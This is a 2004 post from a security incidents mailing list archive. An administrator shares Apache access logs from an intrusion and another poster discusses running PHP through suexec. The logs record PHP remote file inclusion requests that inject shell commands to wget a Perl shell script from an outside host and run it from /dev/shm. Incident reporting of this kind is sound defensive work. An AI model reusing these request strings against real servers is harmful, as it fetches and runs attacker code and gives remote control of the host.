Security Incidents mailing list archives
Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7)
From: "nathan c. dickerson" <nathan () pro net>
Date: Tue, 13 Jul 2004 16:52:23 -0700
Just one correction, I said the logs were useless.. thats not quite true.66.119.34.39 - - [06/Jul/2004:17:47:05 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/var/tmp/..
.;perl%20shell.pl HTTP/1.1" 200 1013666.119.34.39 - - [06/Jul/2004:17:47:17 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20//dev/shm;p
erl%20shell.pl HTTP/1.1" 200 1013666.119.34.39 - - [06/Jul/2004:17:47:19 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;pe
rl%20shell.pl HTTP/1.1" 200 1013666.119.34.39 - - [06/Jul/2004:17:47:33 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls
HTTP/1.1" 200 1006866.119.34.39 - - [06/Jul/2004:17:47:40 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls
HTTP/1.1" 200 1006866.119.34.39 - - [06/Jul/2004:17:48:23 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;wg
et%20http://members.lycos.co.uk/lotsen5k/shell.pl HTTP/1.1" 200 1047966.119.34.39 - - [06/Jul/2004:17:48:23 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;wg
et%20http://members.lycos.co.uk/lotsen5k/shell.pl HTTP/1.1" 200 1006866.119.34.39 - - [06/Jul/2004:17:48:30 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls
HTTP/1.1" 200 1008466.119.34.39 - - [06/Jul/2004:17:48:37 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;pe
rl%20shhell.pl HTTP/1.1" 200 1013766.119.34.39 - - [06/Jul/2004:17:48:51 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;pe
rl%20shell.pl HTTP/1.1" 200 1006866.119.34.39 - - [08/Jul/2004:20:13:59 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;pe
rl%20.shell HTTP/1.1" 200 1013466.119.34.39 - - [08/Jul/2004:20:13:59 -0700] "GET /favicon.ico HTTP/1.1" 404 298 66.119.34.39 - - [08/Jul/2004:20:14:03 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls
HTTP/1.1" 200 1008466.119.34.39 - - [08/Jul/2004:20:14:10 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;wg
et%20http://members.lycos.co.uk/lotsen5k/.shell HTTP/1.1" 200 1047366.119.34.39 - - [08/Jul/2004:20:14:15 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;pe
rl%20.shell HTTP/1.1" 200 10068 I can sleep well tonight, Nathan Dmitry Alyabyev wrote:
On Saturday 10 July 2004 04:40, Tim Greer wrote: [skip]Sounds like one of the many PHP scripts is exploitable. You could run PHP as CGI w/ the suexec wrapper (and even tweak the source or use an existing patch so PHP scripts don't need to be modified at all (other than the ownership of some files/dirs PHP scripts need to use/write to).not really - you will lose authentication within PHP scripts in meaning of receiving password via environment and some add-ons like Zend optimizer will stop working
Current thread:
- Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 09)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Tim Greer (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Dmitry Alyabyev (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Tim Greer (Jul 13)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 14)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 14)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Dmitry Alyabyev (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Frank Knobbe (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 13)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Frank Knobbe (Jul 14)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 13)
- RE: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Bojan Zdrnja (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Tim Greer (Jul 12)